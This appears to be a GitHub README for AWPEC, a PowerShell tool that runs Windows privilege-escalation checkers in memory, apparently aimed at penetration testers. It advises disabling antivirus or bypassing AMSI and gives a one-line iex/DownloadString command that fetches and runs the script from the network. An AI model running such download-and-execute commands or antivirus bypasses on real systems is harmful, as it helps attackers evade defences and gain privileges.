Skip to content
/ AWPEC Public

Automated Windows Privilege Escalation Checks

Notifications You must be signed in to change notification settings

Haxxnet/AWPEC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

🔥 AWPEC 🔥

Automated Windows Privilege Escalation Checks

PowerShell script that automates the tedious tasks of Windows Privilege Escalation


Buy Me A Coffee

💎 Features

AWPEC runs the following privilege escalation tools in memory:

  • PowerUp
  • Seatbelt
  • PrivescCheck
  • WinPEAS

It also supports running ADRecon and auditing the results if you find yourself within an Active Directory domain context.

🎓 Usage

Since the AWPEC PowerShell script relies on various 3rd party tools, which are known for being flagged by AV, we have to either disable antivirus or actively bypass AMSI. Furthermore, as we utilize PowerSharpPack, which reflectively loads C# code, we must ensure to bypass AMSI .NET as well. A basic AMSI PS bypass is not sufficient!

So open a low-priv PowerShell terminal session, bypass AMSI (PS + .NET) and then run the PS script:

# run the AWPEC script
iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Haxxnet/AWPEC/main/Invoke-AWPEC.ps1')

💎 Acknowledgment & Credits

Many thanks to the following individuals:

About

Automated Windows Privilege Escalation Checks

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published